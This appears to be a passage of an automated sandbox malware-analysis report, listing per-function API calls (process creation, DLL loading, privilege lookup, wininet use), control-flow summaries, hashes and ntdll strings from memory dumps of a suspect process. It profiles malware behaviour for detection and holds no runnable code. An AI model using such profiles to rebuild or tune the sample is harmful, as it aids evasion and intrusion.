• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b4091ada8d0694f1339ee0e531a77600af2f5ab84a8154f99ba068b346f11006
• Instruction ID: bb0ca8fb0fc657469d48a9069a2db1e27632c6d5da1782505a46115da5064f32
• Opcode Fuzzy Hash: b4091ada8d0694f1339ee0e531a77600af2f5ab84a8154f99ba068b346f11006
• Instruction Fuzzy Hash: 7090023521148C02D110B25C844474A004587D0301F59C411A4424A58D87D699917221
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2f727d93f5094f785958758df853457f80c8f0c4487a83afdb11efe9c9e388f6
• Instruction ID: 02041f060cbe247c477e3b6f03f828687e0f1e74e237b91ed778436ca2109722
• Opcode Fuzzy Hash: 2f727d93f5094f785958758df853457f80c8f0c4487a83afdb11efe9c9e388f6
• Instruction Fuzzy Hash: ED90023521140C42D100B25C4444B46004587E0301F55C016A0124A54D8756D9517621
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e0fcb7cc12aa957b0535c0decbd0fe837f5f113ee2065f77cd105e6a72968aba
• Instruction ID: 90cc4ac2cffb5c819732cb9376c7cd1091c2167ac18e72e3105bee0d05f7f1c6
• Opcode Fuzzy Hash: e0fcb7cc12aa957b0535c0decbd0fe837f5f113ee2065f77cd105e6a72968aba
• Instruction Fuzzy Hash: B190023521140802D100B69C5448646004587E0301F55D011A5024955EC7A699916231
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 53bebdc2fa8e27df6120168b46003dbfba9d1353ba6734e4f23c144556009322
• Instruction ID: 73747647c265d83e8104a4eec02fe4ad06bccb1d32d74fa6994cfdc78e0b95f3
• Opcode Fuzzy Hash: 53bebdc2fa8e27df6120168b46003dbfba9d1353ba6734e4f23c144556009322
• Instruction Fuzzy Hash: 8B90023561550802D100B25C4554706104587D0201F65C411A0424968D87D69A5166A2
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Blocks: 243 2949080-29490c2 call 294bd40 | 246 294919c-29491a2 (243->246) | 247 29490c8-2949118 call 294be10 call 293acf0 call 2944e50 (243->247) | 254 2949120-2949131 Sleep (247->254) | 255 2949196-294919a (254->255) | 256 2949133-2949139 (254->256) | 255->246 | 255->254 | 257 2949163-2949184 call 2948eb0 (256->257) | 258 294913b-2949161 call 2948ca0 (256->258) | 261 2949189-294918c (257->261) | 258->261 | 261->255
APIs
• Sleep.KERNELBASE(000007D0), ref: 02949128
Strings
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 795b43a4e30455ab9657b98569e92b401ee1749ed8d047564c68aae02d74f105
• Instruction ID: 58558b5e6a41bf62b71efd263d322c600c86f29bde60ce70ebb8fe97ffe0b3ce
• Opcode Fuzzy Hash: 795b43a4e30455ab9657b98569e92b401ee1749ed8d047564c68aae02d74f105
• Instruction Fuzzy Hash: 9F316FB2900644BBD724DF64C885F67B7B9FB88B04F10851DF62A6B245DB30B650CBA4
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Blocks: 263 2949079-29490af | 264 29490bb-29490c2 (263->264) | 265 29490b6 call 294bd40 (263->265) | 266 294919c-29491a2 (264->266) | 267 29490c8-2949118 call 294be10 call 293acf0 call 2944e50 (264->267) | 265->264 | 274 2949120-2949131 Sleep (267->274) | 275 2949196-294919a (274->275) | 276 2949133-2949139 (274->276) | 275->266 | 275->274 | 277 2949163-2949184 call 2948eb0 (276->277) | 278 294913b-2949161 call 2948ca0 (276->278) | 281 2949189-294918c (277->281) | 278->281 | 281->275
APIs
• Sleep.KERNELBASE(000007D0), ref: 02949128
Strings
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 9cb59c965b7988437cd93bb258484d8f04bf3ab432ae8fa70a2d4ecb4f50caba
• Instruction ID: dd928d070403ef0f1a399ce3736776ff179e319d16505fef947ae1d8e1d4eca9
• Opcode Fuzzy Hash: 9cb59c965b7988437cd93bb258484d8f04bf3ab432ae8fa70a2d4ecb4f50caba
• Instruction Fuzzy Hash: 9821A0B1900304ABD714DF64C885FABB7B9FB88B04F10805DEA2D6B245DB70A550CBA4
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Blocks: 295 294a670-294a6a1 call 294af60 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02933AF8), ref: 0294A69D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: 2fb91da42a3c41764a7ac1381c9d7d6875be6649763288cd0400ec7cd035626d
• Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction Fuzzy Hash: F3E04FB12002086FD714DF59CC44EA777ADEF88750F118554FD0857241C630F910CAF0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 7416500e4b44442400f7a0b99e30bf09c2cdf1a80db45bdcaac8482a180589f8
• Instruction ID: 96bb5b86deb8186fbc6c376fca36452ee6df10b06aa248ec5de9adb2e33ecb22
• Opcode Fuzzy Hash: 7416500e4b44442400f7a0b99e30bf09c2cdf1a80db45bdcaac8482a180589f8
• Instruction Fuzzy Hash: B261A2B1901209AFDB25DF64DC89FABB7A9FB44718F00056DF90DA7240DB70AA058FA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 6b4bfee01f0f0ae585d7910d12e9e959c201465b44a42121ed5ee2ee7945086b
• Instruction ID: 5b438846d3f65b00f0e352332529ea728e8043ece8b509922cbaaa62711beb9e
• Opcode Fuzzy Hash: 6b4bfee01f0f0ae585d7910d12e9e959c201465b44a42121ed5ee2ee7945086b
• Instruction Fuzzy Hash: D301AC31A8122977EB21AA949C42FFF771D5F81B54F040155FF04BF1C1EBA4690647E5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
• Instruction ID: a2edbd2a70fec983f1981bfd0109c9d440ac4f56ed2108ffe5b4bf8390d95bd1
• Opcode Fuzzy Hash: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
• Instruction Fuzzy Hash: 0501A731A8122877E721AA949C42FBF776D6B80F54F040115FF04BA1C1EAA4690647F6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
(control-flow graph image not reproduced; entry block 293acf0-293ad19 calls 294cc50, later blocks call 294d070, 294d2f0 and 294b4a0, and block 293ad50-293ad64 calls LdrLoadDll)
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0293AD62
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction ID: 0904eb97d8b4c27da7556cb613021c8dd3a7f9f43db5de0311de713a851837d0
• Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction Fuzzy Hash: 78011EB5E0020DABDF10DAE4DC41F9DB3799F54308F004695E91897241FA31E7148B91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
(control-flow graph image not reproduced; blocks 294a7c4-294a804, with calls to 294af60 and a call to LookupPrivilegeValueW in block 294a7ef-294a804)
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0293F1D2,0293F1D2,?,00000000,?,?), ref: 0294A800
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 09c3ba8b1e811f308a588f7e4d6dc55410958d9fef804bb287468e310d9b3128
• Instruction ID: cf8c7508b67b06fbfbe88cf9695df48e35dc360f1ceabfc97b66bdc8c59d3633
• Opcode Fuzzy Hash: 09c3ba8b1e811f308a588f7e4d6dc55410958d9fef804bb287468e310d9b3128
• Instruction Fuzzy Hash: F3016DB2600104AFDB24EF58DC40EEB376DEF84354F118554FD0C97241CA35E8118BB4
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0294A734
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: affcd83f44376a3705b5f70d1c6c69b8dc6891aa4f52d4192795058a8665a0f2
• Instruction ID: 16c7c956aec881767014986b122b21f8dce694ce276af252ec9114e56ad248fe
• Opcode Fuzzy Hash: affcd83f44376a3705b5f70d1c6c69b8dc6891aa4f52d4192795058a8665a0f2
• Instruction Fuzzy Hash: 7B01BBB6210108BFCB54DF99DC90DEB37ADAF8C754F158258FA0D97240D630E851CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0294A734
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction ID: 6bbe0eac6357fe92baad4cf11d66ba49257b27f2f86382da72e60690fca09ae6
• Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction Fuzzy Hash: DC01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0293F050,?,?,00000000), ref: 029491EC
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
• Instruction ID: 637a9282f982c9bb52f9000002d4b647346ec52afd636bf34931a27194fcb679
• Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
• Instruction Fuzzy Hash: B4E092373803043AE7306599AC02FA7B39CCBC1B20F150026FA0DEB2C0D995F40146E4
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(02944536,?,02944CAF,02944CAF,?,02944536,?,?,?,?,?,00000000,00000000,?), ref: 0294A65D
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: 54ee852f0635896b93889032a800a7b9636f168a6caf34d2488195aaeb8345d6
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction Fuzzy Hash: 26E012B2200208ABDB14EF99CC40EA777ADEF88654F118598BE085B241CA30F9118AB0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0293F1D2,0293F1D2,?,00000000,?,?), ref: 0294A800
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction ID: 8cf92fbbeb15203d8c290ef2c7ae8a919f0e813b3ecef8d480191e7bc44ec00d
• Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction Fuzzy Hash: 64E01AB12002086BDB10DF49CC84EE737ADEF88650F118164BE0857241C930E8118BF5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,02938D14,?), ref: 0293F6FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,02938D14,?), ref: 0293F6FB
Memory Dump Source
• Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2930000_help.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Uniqueness
• Uniqueness Score: -1.00%

Strings
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033646FC
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03364742
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03364655
• CLIENT(ntdll): Processing section info %ws..., xrefs: 03364787
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03364725
• ExecuteOptions, xrefs: 033646A0
• Execute=1, xrefs: 03364713
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
Uniqueness
• Uniqueness Score: -1.00%

Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033602BD
• RTL: Re-Waiting, xrefs: 0336031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033602E7
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Uniqueness
• Uniqueness Score: -1.00%

Strings
• RTL: Resource at %p, xrefs: 03367B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03367B7F
• RTL: Re-Waiting, xrefs: 03367BAC
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
                                                                                                                    • Opcode ID: f126399c458ae2c39ed51bc85470eedf5316b929b9cffb803424f5de582b6235
                                                                                                                    • Instruction ID: a4d8b1913b2452cbcb254e4453ed978683a2d2bc762330f9abd784e2c4f2224e
                                                                                                                    • Opcode Fuzzy Hash: f126399c458ae2c39ed51bc85470eedf5316b929b9cffb803424f5de582b6235
                                                                                                                    • Instruction Fuzzy Hash: 8C41F335701702AFC724DE25CC80B6AFBE9EF89720F040A1DF85ADB680DB71E4458B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0336728C
Strings
• RTL: Resource at %p, xrefs: 033672A3
• RTL: Re-Waiting, xrefs: 033672C1
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03367294
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: b86323a7a138bfd242cfce62048b56cdc5814714c7fed969e1f16ed9baae3665
• Instruction ID: 8c412d8158a04b171eb94f59a39787f816847882e2d72b50a3e8d75b8441e5df
• Opcode Fuzzy Hash: b86323a7a138bfd242cfce62048b56cdc5814714c7fed969e1f16ed9baae3665
• Instruction Fuzzy Hash: B741DF35A00316AFD720DE25CCC1B6ABBA9FF85714F144619F856AB680DB21F8868BD1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 32efc38ecf58047c9de66d138e4f0c5314210733d04f92c5d8f4d81509ada924
• Instruction ID: 2104f8015a5197e6c40ecfa9e929aa41e445689d8ed393cccf6dcbdbb11c05bb
• Opcode Fuzzy Hash: 32efc38ecf58047c9de66d138e4f0c5314210733d04f92c5d8f4d81509ada924
• Instruction Fuzzy Hash: 10317876A106199FCB20DF2DDC80BEFB7F8EF45610F444595E849E7240EB30AA448FA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
